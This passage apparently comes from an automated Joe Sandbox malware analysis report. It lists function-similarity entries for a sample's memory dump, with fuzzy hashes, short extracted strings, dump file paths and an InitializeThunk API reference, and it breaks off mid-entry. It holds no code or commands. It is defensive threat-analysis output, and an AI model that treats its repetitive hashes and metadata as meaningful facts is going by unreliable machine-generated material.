                                                                                                      • Opcode Fuzzy Hash: 1ba7b176f8ced702ba111b01269cc1303e640371b7e5de905187344c9e281742
                                                                                                      • Instruction Fuzzy Hash: 8BF18471628341EFE304CF25D891B2ABBE6EF85344F14892DF5968B3A1C734D945CB22
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Inf$NaN
                                                                                                      • API String ID: 0-3500518849
                                                                                                      • Opcode ID: 44c41b0dbaf99e02887c005771fbf78a548b2323f59f9d92b7ceb8f5a72742a1
                                                                                                      • Instruction ID: 6fa9f4bf82c8e3471b3652ac4eacb5f872efeb08757168838491bf7fc62d884c
                                                                                                      • Opcode Fuzzy Hash: 44c41b0dbaf99e02887c005771fbf78a548b2323f59f9d92b7ceb8f5a72742a1
                                                                                                      • Instruction Fuzzy Hash: 83D1D571A083119BC704CF29C88061FBBE6EBC9750F258A2DF9D9973A0E775DD058B92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BaBc$Ye[g
                                                                                                      • API String ID: 0-286865133
                                                                                                      • Opcode ID: ca8bb714f8dc000c6bbe801638cef1f98efb483386347795bdbe2146f0af596c
                                                                                                      • Instruction ID: eab75a98989c07fca443bc3a6ffd3671d667baad33704bb02dc7b7ac2792db7d
                                                                                                      • Opcode Fuzzy Hash: ca8bb714f8dc000c6bbe801638cef1f98efb483386347795bdbe2146f0af596c
                                                                                                      • Instruction Fuzzy Hash: B6518BB1608382CBD731CF18C481BABBBE0FF96364F19491DE49A8B651E3749940DB67
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2s{
                                                                                                      • API String ID: 0-2426408216
                                                                                                      • Opcode ID: d523b13be97f5da54fa54dad69d6b379af16fdfc3d29179c355884d92dcfe79c
                                                                                                      • Instruction ID: 927470ceafd0ec1d4b57018e4ff6a14c1952e01e36d5038003938aed196598dd
                                                                                                      • Opcode Fuzzy Hash: d523b13be97f5da54fa54dad69d6b379af16fdfc3d29179c355884d92dcfe79c
                                                                                                      • Instruction Fuzzy Hash: 27722AF390C2049FE3046E29EC4577ABBE9EFD4760F1A853DEAC483744EA3598058697
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %1.17g
                                                                                                      • API String ID: 0-1551345525
                                                                                                      • Opcode ID: d9adebcc61af0ade64ea33129e8a7a82a1e89efe583e01c2f61f2070878e5651
                                                                                                      • Instruction ID: 1662b3b32f8819eaa5165902b61ce6e3d559eab0455d3fe6ca42e09e457f352a
                                                                                                      • Opcode Fuzzy Hash: d9adebcc61af0ade64ea33129e8a7a82a1e89efe583e01c2f61f2070878e5651
                                                                                                      • Instruction Fuzzy Hash: B322F6B6A08B42CBE7158F18E840327BBE2AFE2314F1D856DE8994B349E775DC05C761
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "
                                                                                                      • API String ID: 0-123907689
                                                                                                      • Opcode ID: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                                                      • Instruction ID: 6511bc803d916ba92b006e800612b6d726a4e3ac07ed8970809024bff90c385b
                                                                                                      • Opcode Fuzzy Hash: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                                                      • Instruction Fuzzy Hash: CFF10479A083516BC724CE248490A6BBBE6EFC5350F1CC96EE89987382D634DD05C7B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %*+(
                                                                                                      • API String ID: 0-3233224373
                                                                                                      • Opcode ID: bd9ca16e1b9ec192e14b6eaad61614cd023a8ffe4985395bc0d7f61ce77dfd26
                                                                                                      • Instruction ID: 6eed22a96ac371c3f9d5ff7fd1beee9b7d20485e5ec6309d4d1923ba76af1cd4
                                                                                                      • Opcode Fuzzy Hash: bd9ca16e1b9ec192e14b6eaad61614cd023a8ffe4985395bc0d7f61ce77dfd26
                                                                                                      • Instruction Fuzzy Hash: C8E1DA75508306CBC314DF28C880A6FB7E2FF987A1F58891DE4C587220E335E959CBA2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %*+(
                                                                                                      • API String ID: 0-3233224373
                                                                                                      • Opcode ID: 1e4bca42947bb7b4d030fd0017aca44550d0c03c7139fceda2a457b0a7920e03
                                                                                                      • Instruction ID: 56bcf009b1c8bb4d26569defe4b600777ddfead0f56f77c714f5eb5620cd879e
                                                                                                      • Opcode Fuzzy Hash: 1e4bca42947bb7b4d030fd0017aca44550d0c03c7139fceda2a457b0a7920e03
                                                                                                      • Instruction Fuzzy Hash: C7F18E75A00B01CFC724AF24D881A66B7F6FF49314B288A2DE49787791EB34F815CB61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %*+(
                                                                                                      • API String ID: 0-3233224373
                                                                                                      • Opcode ID: 19ba3928f8363583b0a15e0639d45783febae020a47d1fcf7850f7474185f259
                                                                                                      • Instruction ID: 69104cf08ed26eaab8a60e001ba214947051ebe2b4eed64d0d27d73d3da5a2cd
                                                                                                      • Opcode Fuzzy Hash: 19ba3928f8363583b0a15e0639d45783febae020a47d1fcf7850f7474185f259
                                                                                                      • Instruction Fuzzy Hash: A1C18A71908302ABD710AB14C882F2BB7E5EF96754F08881CF8C597251E735ED15EBB2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %*+(
                                                                                                      • API String ID: 0-3233224373
                                                                                                      • Opcode ID: 628b211b083594d858fc1dce8431e5193b14e38390bc7fc7e27d3f33e02cf45a
                                                                                                      • Instruction ID: b180462a98279cc8c796c6fc1808b82b20079316bba5df7e5410971a0ff29d45
                                                                                                      • Opcode Fuzzy Hash: 628b211b083594d858fc1dce8431e5193b14e38390bc7fc7e27d3f33e02cf45a
                                                                                                      • Instruction Fuzzy Hash: 2DD16670618302DFD704DF68EC90A2ABBE5FB89314F59886CE886C7792D735E950CB61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P
                                                                                                      • API String ID: 0-3110715001
                                                                                                      • Opcode ID: 15a710126650f066bfebfb9c8222af82f1901d005738cf94e2c0dadbd14bda67
                                                                                                      • Instruction ID: ab95caf5fc286edac49461ba8369989feea532bdcc892bd5e1b6d451a9f1ddef
                                                                                                      • Opcode Fuzzy Hash: 15a710126650f066bfebfb9c8222af82f1901d005738cf94e2c0dadbd14bda67
                                                                                                      • Instruction Fuzzy Hash: 37D1F7729083A14FC725DE19D89071EB7E2EB85718F19862CE9B9AB380CB71DC05D7E1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: %*+(
                                                                                                      • API String ID: 2994545307-3233224373
                                                                                                      • Opcode ID: 15908840cd4e6ac32d8d5aad951c5d0f23f30463473b993f4f6af79ee7ce1489
                                                                                                      • Instruction ID: 9ad7ec9ae4fd8f9922fd55dca1ff85c11406b27ff2a250085bc55d679594412a
                                                                                                      • Opcode Fuzzy Hash: 15908840cd4e6ac32d8d5aad951c5d0f23f30463473b993f4f6af79ee7ce1489
                                                                                                      • Instruction Fuzzy Hash: 22B1CE706193029BD714EF18D880B2BBBE6EF86350F18592CE6C98B351E335D855CBB2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 0-3772416878
                                                                                                      • Opcode ID: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                                                      • Instruction ID: 10334f6ee5a24343d26a6fb86f9edd448847ae4dde12469f6cf3000980b73fb6
                                                                                                      • Opcode Fuzzy Hash: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                                                      • Instruction Fuzzy Hash: DDB11A711093819FD325CF18C88061BBBE1AFAA704F484E2DF5D997782D671EA18CB67
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %*+(
                                                                                                      • API String ID: 0-3233224373
                                                                                                      • Opcode ID: 480f744a118f96f19dc568be1f97db40bd37c7328d9b02f22d621b6d31f401f7
                                                                                                      • Instruction ID: 783299d1646ee007352f237755f25479563957c8b2bf018cacf91076405bdb3e
                                                                                                      • Opcode Fuzzy Hash: 480f744a118f96f19dc568be1f97db40bd37c7328d9b02f22d621b6d31f401f7
                                                                                                      • Instruction Fuzzy Hash: 5481A971518341ABD710AF69E884B2AB7E6EF99705F18882DF6C687391D730E814CB72
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %*+(
                                                                                                      • API String ID: 0-3233224373
                                                                                                      • Opcode ID: d02ffe831d3d248116f8b5f291ca2741b315571006132d551a16e36463f61545
                                                                                                      • Instruction ID: ea6c30a5c57449e057c5a790ab048bb9b8a265b5273f6613b87e26574a0114d3
                                                                                                      • Opcode Fuzzy Hash: d02ffe831d3d248116f8b5f291ca2741b315571006132d551a16e36463f61545
                                                                                                      • Instruction Fuzzy Hash: 11619FB1909304DBD720AF58DC42A7AB3E5FF95354F484928E9868B352F735E910C7B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: W
                                                                                                      • API String ID: 0-3977557418
                                                                                                      • Opcode ID: d8554cd58c166b8c6c7776547a30759152000052646da1762a9a897bad5bd1bd
